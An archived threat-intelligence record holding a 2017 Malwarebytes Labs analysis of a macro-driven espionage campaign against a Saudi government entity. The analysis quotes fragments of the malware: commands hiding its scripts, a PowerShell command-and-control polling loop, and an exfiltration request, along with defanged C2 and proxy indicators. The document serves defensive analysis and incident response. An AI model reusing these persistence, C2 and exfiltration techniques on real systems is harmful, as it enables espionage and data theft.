{
	"id": "091fe8d9-152f-4e88-b930-f2fda419d446",
	"created_at": "2026-04-06T00:22:38.324598Z",
	"updated_at": "2026-04-10T13:12:16.569374Z",
	"deleted_at": null,
	"sha1_hash": "ae77ae44f928145c03c6e57eba130b647209b380",
	"title": "Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 536495,
	"plain_text": "Elaborate scripting-fu used in espionage attack against Saudi\r\nArabia Government entity\r\nBy Malwarebytes Labs\r\nPublished: 2017-09-25 · Archived: 2026-04-05 23:18:03 UTC\r\nWe recently came across a campaign targeting a Saudi Arabia Government entity via a malicious Word document\r\nwhich at first reminded us of an attack we had previously described on this blog.\r\nIn our previous research, we detailed how an information stealer Trojan was deployed via a Word macro, in order\r\nto spy on its victims (various parts of the Saudi Government). The stolen information was transmitted back to the\r\nthreat actors’ infrastructure in an encrypted format.\r\nThis new threat also uses a macro to infect the target’s computer, but rather than retrieving a binary payload, it\r\nrelies on various scripts to maintain its presence and to communicate via hacked websites, acting as proxies for the\r\ncommand and control server.\r\nThe malicious script fingerprints the victim’s machine and can receive any command that will run via PowerShell.\r\nIn this blog post, we will describe the way this threat enters the system and maintains its presence while constantly\r\ncommunicating with its command and control server.\r\nCovert delivery and persistence\r\nThe decoy document bears the logo of one of the branches of the Saudi Government and prompts the user to\r\n“Enable Content” stating that the document is in protected view (which is actually true).\r\nA high-level summary static analysis of this document reveals that it includes a macro as well as several Base64\r\nencoded strings.\r\nOLE:MAS--B-- target.doc (Flags: M=Macros, A=Auto-executable, S=Suspicious keywords, B=Base64 strings\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/\r\nPage 1 of 8\n\nOne of the first routines the malicious VBScript performs is to disable or lower security settings within Microsoft\r\nExcel and Word by altering corresponding registry keys with values of “1”, meaning: Enable All (ref).\r\nThe VBScript also fingerprints the victim for their IP address by querying the\r\nWin32_NetworkAdapterConfiguration class:\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/\r\nPage 2 of 8\n\nIt then proceeds to retrieve a stream of data from the Pastebin website using its own proxy:\r\nThe data is converted into two scripts, a PowerShell and a Visual Basic one, the latter being used for persistence\r\non the infected machine via two different hook points: a Run key in the registry and a scheduled task.\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/\r\nPage 3 of 8\n\nThis VBScript is really a launcher for the more important PowerShell script, and both are stored as hidden system\r\nfiles under the Documents folder using the following commands:\r\nattrib +s +h \"C:UserspublicdocumentsNTSTATS.ps1\" attrib +s +h \"C:UserspublicdocumentsNTSTATS.vbs\"\r\nEspionage and exfiltration\r\nThat PowerShell script also has the same instructions to lower Office’s security settings but more importantly is\r\nused to exfiltrate data and communicate with the command and control server.\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/\r\nPage 4 of 8\n\nA unique ID is stored on the victim’s machine (in the same folder as the scripts) in a file called [username].key\r\nand is used to receive instructions via a server located in Germany (although it appears to be down at the time of\r\nwriting).\r\nGEThttp://144.76.109[.]88/al/?action=getCommand\u0026id=[user ID]HTTP/1.1\r\nA function called getKey retrieves the unique ID from the .key file stored on the local hard drive to register the\r\nmachine as a new victim. If the key file does not exist, it queries for additional system information (computer\r\nname, IP address, OS version) and then creates that key (Set-Content $keypath $id).\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/\r\nPage 5 of 8\n\nAnother function called getCommand uses the key as a parameter to then contact the C2. This command runs\r\nevery 5 minutes:\r\nwhile ($true){ getCommand $key start-sleep -Seconds 300 }\r\nThe malicious script can receive and run any command the attackers want via PowerShell, making this a very\r\npowerful attack.\r\nThe eventual exfiltration of data is done via several hardcoded websites acting as a proxy via the sendResult\r\nfunction:\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/\r\nPage 6 of 8\n\nThe transmission of data is done via Base64 encoded strings, one for the user id (.key file) and one for the\r\nexfiltrated data.\r\nGET /wp-content/wp_fast_cache/wmg-global.com/Senditem.php?c=[removed]== HTTP/1.1 Host: www.wmg-global\r\nThe parameters passed on the URL in the Base64 format:\r\naction=saveResult\u0026id=[removed]\u0026cmd=2\u0026chunk=last\u0026res=[removed]=\r\nDecoding the value in the variable “res”, we get the following info.\r\nConnection-specific DNS Suffix . : [removed] Description . . . . . . . . . . . : [removed] Physical A\r\nScript based attack and protection\r\nThis attack is very different from the typical malicious spam we see on a daily basis, blasting Locky or some\r\nbanking Trojan. Indeed, there is no malicious binary payload (although one could be downloaded by the C2)\r\nwhich makes us think the attackers are trying to keep a low profile and remain on the system while collecting\r\ninformation from their target.\r\nRelying on scripts as part of the attack chain and ongoing infection is an interesting concept due to how modular it\r\nis, not to mention more likely to stay undetected from antivirus engines. At the same time, it needs to rely on\r\nvarious encoding techniques because it can’t make use of a packer like a traditional malware binary would. \r\nMalwarebytes users are already protected against this attack thanks to our signature-less engine.\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/\r\nPage 7 of 8\n\nIndicators of compromise\r\nScripts:\r\nC:UserspublicdocumentsNTSTATS.ps1 C:UserspublicdocumentsNTSTATS.vbs\r\nC2:\r\n144.76.109[.]88/al/\r\nProxies:\r\nlarsson-elevator[.]com/plugins/xmap/com_k2/com.php?c= spearhead-training[.]com/action/point2.php?c= i\r\nSource: https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-governme\r\nnt_entity/\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/"
	],
	"report_names": [
		"elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity"
	],
	"threat_actors": [],
	"ts_created_at": 1775434958,
	"ts_updated_at": 1775826736,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ae77ae44f928145c03c6e57eba130b647209b380.pdf",
		"text": "https://archive.orkl.eu/ae77ae44f928145c03c6e57eba130b647209b380.txt",
		"img": "https://archive.orkl.eu/ae77ae44f928145c03c6e57eba130b647209b380.jpg"
	}
}